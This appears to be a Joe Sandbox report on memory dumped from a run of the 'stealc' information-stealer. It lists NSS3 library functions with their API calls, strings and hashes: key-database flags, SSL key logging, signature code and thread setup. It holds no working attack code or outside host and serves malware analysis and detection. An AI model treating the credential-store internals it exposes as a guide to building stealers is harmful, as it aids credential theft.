Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 07bfab9ca54394037c5bc48bc538b79229f4fa29044f57ea59711f7fdd22b981
Instruction ID: 7832c983f38dfdd35531fc6c796e5748b2b78998fc6e8a83f62a34654b4d033b
Opcode Fuzzy Hash: 07bfab9ca54394037c5bc48bc538b79229f4fa29044f57ea59711f7fdd22b981
Instruction Fuzzy Hash: 7AF1BCB1D00209AFDF10EF68D984A9EBBB4BF09318F154968EC14A7711EB31ED95CB91

Function 6C8D6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8D6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C8D6943
Part of subcall function 6C8D6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C8D6957
Part of subcall function 6C8D6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C8D6972
Part of subcall function 6C8D6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C8D6983
Part of subcall function 6C8D6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C8D69AA
Part of subcall function 6C8D6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C8D69BE
Part of subcall function 6C8D6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C8D69D2
Part of subcall function 6C8D6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C8D69DF
Part of subcall function 6C8D6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C8D6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8D6D8C
free.MOZGLUE(00000000), ref: 6C8D6DC5
free.MOZGLUE(?), ref: 6C8D6DD6
free.MOZGLUE(?), ref: 6C8D6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8D6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6E72
free.MOZGLUE(?), ref: 6C8D6EA7
free.MOZGLUE(?), ref: 6C8D6EC4
free.MOZGLUE(?), ref: 6C8D6ED5
free.MOZGLUE(00000000), ref: 6C8D6EE3
free.MOZGLUE(?), ref: 6C8D6EF4
free.MOZGLUE(?), ref: 6C8D6F08
free.MOZGLUE(00000000), ref: 6C8D6F35
free.MOZGLUE(?), ref: 6C8D6F44
free.MOZGLUE(?), ref: 6C8D6F5B
free.MOZGLUE(00000000), ref: 6C8D6F65

Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8D781D,00000000,6C8CBE2C,?,6C8D6B1D,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C40
Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8D781D,?,6C8CBE2C,?), ref: 6C8D6C58
Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C6F
Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8D6C84
Part of subcall function 6C8D6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8D6C96
Part of subcall function 6C8D6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8D6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C8D6FF4

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: b853aa4a77ce4eb60f6e5562fda9b4e1089b089f1fd53af98d10591d93468433
Instruction ID: aaec9fbfe67ceb3a75199564661fed15c9d9817f87eb58d1a7817c9c66d0f463
Opcode Fuzzy Hash: b853aa4a77ce4eb60f6e5562fda9b4e1089b089f1fd53af98d10591d93468433
Instruction Fuzzy Hash: 66B16FB0E0121E9FDF20DBA9DA44B9E7BB4AF09359F260D25E815E7600E731F914CB61

Function 6C8D4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8D4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C8D4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4DB7

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB

TlsGetValue.KERNEL32 ref: 6C8D4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C8D4DEC
PR_Unlock.NSS3(?), ref: 6C8D4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C8D4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C8D4E71
free.MOZGLUE(00000000), ref: 6C8D4E7A
PR_Unlock.NSS3(?), ref: 6C8D4EA2
TlsGetValue.KERNEL32 ref: 6C8D4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C8D4ED6
PR_Unlock.NSS3(?), ref: 6C8D4F01
free.MOZGLUE(00000000), ref: 6C8D4F2A

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 47394a075bb13a6738a236cb680b8694520724aea01e7dc7950b77ad99ce2948
Instruction ID: 857bd85f93d1cefaa67306aaeda78e00f1ac25817594fcce035de87d7683ee45
Opcode Fuzzy Hash: 47394a075bb13a6738a236cb680b8694520724aea01e7dc7950b77ad99ce2948
Instruction Fuzzy Hash: 7AB13475A042069FDB10EF68E984AAA77B4BF89318F164924EC1597B01EB30F964CBD1

Function 6C926E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C926BF7), ref: 6C926EB6

Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C9CFC0A,6C926BF7), ref: 6C926ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C926EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C926EFC
PR_NewLock.NSS3 ref: 6C926F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C926F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C926BF7), ref: 6C926F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C926BF7), ref: 6C926F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C926BF7), ref: 6C926FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C926BF7), ref: 6C926FFD

Strings

NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C926FDB
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C926EF7
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C926FF8
SSLKEYLOGFILE, xrefs: 6C926EB1
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C926F4F
SSLFORCELOCKS, xrefs: 6C926F2B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 4b297c374b6d96d03faa7aff4f591da2b7a86ad3271e991fc879cb8f9f5da9e3
Instruction ID: 5e25eaed3a02de20630d7f9d03bf125ea78b3e8e67bcc91252e1514cebf636fc
Opcode Fuzzy Hash: 4b297c374b6d96d03faa7aff4f591da2b7a86ad3271e991fc879cb8f9f5da9e3
Instruction Fuzzy Hash: BEA127B2A7998086EB10463CEC0039437E9AB93329F684365E8B5D7EDCDB7DE450C352

Function 6C8A5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A5DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C8A5E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C8A5E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C8A5E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C8A5EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C8A5ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C8A5F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C8A5F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8A5F89
free.MOZGLUE(?), ref: 6C8A5FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8A5FB6
free.MOZGLUE(00000000), ref: 6C8A5FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8A600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8A6079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8A6084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8A6094

Strings

, xrefs: 6C8A5EEB

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: 50b35f9aaccf0e27d5b492b7078d1805c8a9b6cbe53a88519845c10d323d9d8c
Instruction ID: ad29edfe5ee1585c3257153c22ba6da458fa5297760c413225ea944a5d6a5514
Opcode Fuzzy Hash: 50b35f9aaccf0e27d5b492b7078d1805c8a9b6cbe53a88519845c10d323d9d8c
Instruction Fuzzy Hash: 978119B1E007059BDF30CAA8CE80B9E77B4AF48318F144928E819E7B51E730E996C7D1

Function 6C9A9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C9A9C70
PR_NewLock.NSS3 ref: 6C9A9C85

Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5

PR_NewCondVar.NSS3(00000000), ref: 6C9A9C96

Part of subcall function 6C87BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C8821BC), ref: 6C87BB8C

PR_NewLock.NSS3 ref: 6C9A9CA9

Part of subcall function 6C9598D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C959946
Part of subcall function 6C9598D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8116B7,00000000), ref: 6C95994E
Part of subcall function 6C9598D0: free.MOZGLUE(00000000), ref: 6C95995E

PR_NewLock.NSS3 ref: 6C9A9CB9
PR_NewLock.NSS3 ref: 6C9A9CC9
PR_NewCondVar.NSS3(00000000), ref: 6C9A9CDA

Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C87BBEB
Part of subcall function 6C87BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C87BBFB
Part of subcall function 6C87BB80: GetLastError.KERNEL32 ref: 6C87BC03
Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C87BC19
Part of subcall function 6C87BB80: free.MOZGLUE(00000000), ref: 6C87BC22

PR_NewCondVar.NSS3(?), ref: 6C9A9CF0
PR_NewPollableEvent.NSS3 ref: 6C9A9D03

Part of subcall function 6C99F3B0: PR_CallOnce.NSS3(6C9F14B0,6C99F510), ref: 6C99F3E6
Part of subcall function 6C99F3B0: PR_CreateIOLayerStub.NSS3(6C9F006C), ref: 6C99F402
Part of subcall function 6C99F3B0: PR_Malloc.NSS3(00000004), ref: 6C99F416
Part of subcall function 6C99F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C99F42D
Part of subcall function 6C99F3B0: PR_SetSocketOption.NSS3(?), ref: 6C99F455
Part of subcall function 6C99F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C99F473

Part of subcall function 6C959890: TlsGetValue.KERNEL32(?,?,?,6C9597EB), ref: 6C95989E

EnterCriticalSection.KERNEL32(?), ref: 6C9A9D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C9A9DAF
_PR_CreateThread.NSS3(00000000,6C9A9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C9A9D9F

Part of subcall function 6C87B3C0: TlsGetValue.KERNEL32 ref: 6C87B403
Part of subcall function 6C87B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C87B459

_PR_CreateThread.NSS3(00000000,6C9AA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C9A9DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C9A9DFC
_PR_CreateThread.NSS3(00000000,6C9AA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C9A9E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C9A9E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C9A9E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C9A9E89

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: b8f19b66221883eb4052ccd7dda875552095939c0e4151d4fdd8f267bb9563ad
Instruction ID: 37278457bf464d06a8f09836b2c96a9da6d2c323717e87bcd33bcd8255607389
Opcode Fuzzy Hash: b8f19b66221883eb4052ccd7dda875552095939c0e4151d4fdd8f267bb9563ad
Instruction Fuzzy Hash: 696150B1A00706AFE710DF79C844A6BBBF8FF18208B154539E859C7B51EB31E855CBA1

Function 6C8E8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8E9E
PORT_ArenaAlloc_Util.NSS3(6C9F0B64,00000001,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C8E8E01,00000000,6C8E9060,6C9F0B64), ref: 6C8E8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C8E8E01), ref: 6C8E8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C9F0B64,6C9F0B64), ref: 6C8E8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C8E8F3F

Part of subcall function 6C8EA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C8EA421,00000000,00000000,6C8E9826), ref: 6C8EA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8E904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C8E8E76

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: e804eb827a8f390317b9f25de55db4ff9d8148711ca23e69d9e8b90524aa8c5b
Instruction ID: a6c14f228868ce4875c2f841697e90f7f676541a57a4f00ed8940f2be6a77fcf
Opcode Fuzzy Hash: e804eb827a8f390317b9f25de55db4ff9d8148711ca23e69d9e8b90524aa8c5b
Instruction Fuzzy Hash: DE6191B5D0111A9BDB20CF55DD80AEFB7B5EF99358F144928DC18A7700E732E916CBA0

Function 6C898E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C898E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C898E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C898EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C9C18D0,?), ref: 6C898F03
PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C898F19
PL_FreeArenaPool.NSS3(?), ref: 6C898F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C898F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C898F65
PL_FinishArenaPool.NSS3(?), ref: 6C898FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C898FFE
PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C899012
PL_FreeArenaPool.NSS3(?), ref: 6C899024
PL_FinishArenaPool.NSS3(?), ref: 6C89902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C89903E

Strings

security, xrefs: 6C898EE7

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 0a089ff522d8232af53140fd34334c65618c873eb62142d83a236fff19e18e9e
Instruction ID: fde2608101a9635a0e2d0e2b3602b8e253505c60402871ae9b9e86ede0599d3b
Opcode Fuzzy Hash: 0a089ff522d8232af53140fd34334c65618c873eb62142d83a236fff19e18e9e
Instruction Fuzzy Hash: D15136B1608301ABD7309A5DDE41BAF73A8ABD679CF440C2EF46997B40E731D9098753

Function 6C95CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C95CC7B), ref: 6C95CD7A

Part of subcall function 6C95CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C8CC1A8,?), ref: 6C95CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C95CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C95CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C95CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C95CD8E

Part of subcall function 6C8805C0: PR_EnterMonitor.NSS3 ref: 6C8805D1
Part of subcall function 6C8805C0: PR_ExitMonitor.NSS3 ref: 6C8805EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C95CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C95CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C95CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C95CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C95CE48

Strings

getaddrinfo, xrefs: 6C95CD88, 6C95CDF9
wship6.dll, xrefs: 6C95CDE3
ws2_32.dll, xrefs: 6C95CD75
freeaddrinfo, xrefs: 6C95CD9F, 6C95CE10
getnameinfo, xrefs: 6C95CDB2, 6C95CE23

Memory Dump Source

